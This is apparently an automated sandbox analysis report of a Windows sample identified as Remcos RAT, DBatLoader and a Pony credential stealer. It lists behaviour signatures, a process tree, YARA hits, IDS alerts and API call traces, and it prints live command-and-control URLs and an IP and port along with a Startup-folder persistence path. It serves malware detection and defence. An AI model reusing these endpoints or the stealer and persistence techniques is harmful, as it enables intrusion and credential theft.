
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1574872
MD5: 21d13f2f3c4db8f083b672d81831fa5e
SHA1: b93f931a10a8a4b6f155b6b2ad9c5f9fbb3d71d0
SHA256: 17bb66d25ec39d1818cc01e067ea7139eef15dcb24bce24840666eede661a3c3
Tags: exe, user-jstrosch

Detection

Remcos, DBatLoader, Pony
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Pony
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Drops PE files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Pony trojan / infostealer detected
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 4084 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
    • SGS.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\Temp\SGS.exe" MD5: 31B2F8C329A601B145E7E71A6D120A7B)
      • SGS.exe (PID: 4720 cmdline: C:\Users\user\AppData\Local\Temp\SGS.exe MD5: 31B2F8C329A601B145E7E71A6D120A7B)
        • cmd.exe (PID: 6536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 432 cmdline: C:\Users\user\Desktop\file.exe MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • file.exe (PID: 1076 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
    • SGS.exe (PID: 7148 cmdline: "C:\Users\user\AppData\Local\Temp\SGS.exe" MD5: 31B2F8C329A601B145E7E71A6D120A7B)
      • SGS.exe (PID: 6656 cmdline: C:\Users\user\AppData\Local\Temp\SGS.exe MD5: 31B2F8C329A601B145E7E71A6D120A7B)
        • cmd.exe (PID: 2220 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 6000 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: EvilPony, Ponyshe
Description: Privately modded version of the Pony stealer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony
Malware configuration (Pony, extracted from 5.2.SGS.exe.400000.0.unpack): {"C2 list": ["http://admino.ml/eme/gate.php", "http://admino.ml/eme/kachistub.exe"]}
Yara matches (Source | Rule | Description | Author; matched strings listed beneath the row where the report shows them)

Sample:
file.exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

Dropped files:
C:\Users\user\AppData\Local\Temp\SGS.exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

Memory dumps:
0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x17d0:$a2: Mutex_RemWatchdog
  • 0x680:$a3: %02i:%02i:%02i:%03i
  • 0x6c4:$a3: %02i:%02i:%02i:%03i
  • 0x1bac:$a3: %02i:%02i:%02i:%03i
00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp | pony | Identify Pony | Brian Wallace @botnet_hunter
  • 0xf97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x7b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
  • 0xdda:$s3: POST %s HTTP/1.0
  • 0xe03:$s4: Accept-Encoding: identity, *;q=0
  • 0xf10:$s4: Accept-Encoding: identity, *;q=0
(15 entries in this table; the remainder are not shown)

Unpacked PE files:
5.2.SGS.exe.400000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
5.2.SGS.exe.400000.0.unpack | JoeSecurity_Pony | Yara detected Pony | Joe Security
5.2.SGS.exe.400000.0.unpack | Windows_Trojan_Pony_d5516fe8 | unknown | unknown
  • 0x1540c:$a1: \Global Downloader
  • 0x14b95:$a2: wiseftpsrvs.bin
  • 0x1526c:$a3: SiteServer %d\SFTP
  • 0x15260:$a4: %s\Keychain
  • 0x154ca:$a5: Connections.txt
  • 0x15811:$a6: ftpshell.fsi
  • 0x15f6c:$a7: inetcomm server passwords
5.2.SGS.exe.400000.0.unpack | pony | Identify Pony | Brian Wallace @botnet_hunter
  • 0x13d97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x15fb3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x135b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
  • 0x13bda:$s3: POST %s HTTP/1.0
  • 0x13c03:$s4: Accept-Encoding: identity, *;q=0
  • 0x13d10:$s4: Accept-Encoding: identity, *;q=0
5.2.SGS.exe.400000.0.unpack | Fareit | Fareit Payload | kevoreilly
  • 0x16202:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
(7 entries in this table; the remainder are not shown)

System Summary

Source: Network Connection; Author: Florian Roth (Nextron Systems); Data: DestinationIp: 154.16.63.197, DestinationIsIpv6: false, DestinationPort: 3360, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 432, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 4084, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 432, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T17:57:34.496629+0100 | 2022550 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 93.125.99.121 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T17:57:38.174795+0100 | 2829308 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49705 | 154.16.63.197 | 3360 | TCP
2024-12-13T17:58:05.189475+0100 | 2829308 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49751 | 154.16.63.197 | 3360 | TCP
2024-12-13T17:58:32.236209+0100 | 2829308 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49815 | 154.16.63.197 | 3360 | TCP
2024-12-13T17:58:59.393580+0100 | 2829308 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49878 | 154.16.63.197 | 3360 | TCP
2024-12-13T17:59:26.877943+0100 | 2829308 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49942 | 154.16.63.197 | 3360 | TCP
2024-12-13T17:59:53.972078+0100 | 2829308 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49981 | 154.16.63.197 | 3360 | TCP
2024-12-13T18:00:21.020725+0100 | 2829308 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49982 | 154.16.63.197 | 3360 | TCP
2024-12-13T18:01:15.096357+0100 | 2829308 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49984 | 154.16.63.197 | 3360 | TCP


AV Detection

Source: file.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Avira: detection malicious, Label: HEUR/AGEN.1331271
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe; Avira: detection malicious, Label: HEUR/AGEN.1331271
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe; Avira: detection malicious, Label: HEUR/AGEN.1331271
Source: 5.2.SGS.exe.400000.0.unpack; Malware Configuration Extractor: Pony {"C2 list": ["http://admino.ml/eme/gate.php", "http://admino.ml/eme/kachistub.exe"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe; ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe; ReversingLabs: Detection: 73%
Source: file.exe; ReversingLabs: Detection: 73%
Source: Yara match; File source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
Source: Yara match; File source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 93.2% probability
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe; Joe Sandbox ML: detected
Source: file.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040A712 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,5_2_0040A712
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,5_2_0040D3BE
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040BC36 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,5_2_0040BC36
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040A557 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,5_2_0040A557
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040A96D CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,5_2_0040A96D
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040CE3D lstrlen,CryptUnprotectData,LocalFree,5_2_0040CE3D
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_0040AB24 lstrlen,CryptUnprotectData,LocalFree,5_2_0040AB24
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_004043DC CryptUnprotectData,LocalFree,5_2_004043DC
Source: file.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,5_2_004051E3
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_004041A6
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,5_2_00404E73
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_00408AE5
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,5_2_00409832
Source: C:\Users\user\AppData\Local\Temp\SGS.exe; Code function: 5_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_00408961
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe; Code function: 11_2_00406920 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_00406920
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004065DB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_tr
aits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_004065DB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004031ED ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_004031ED
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040D9F4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040D9F4
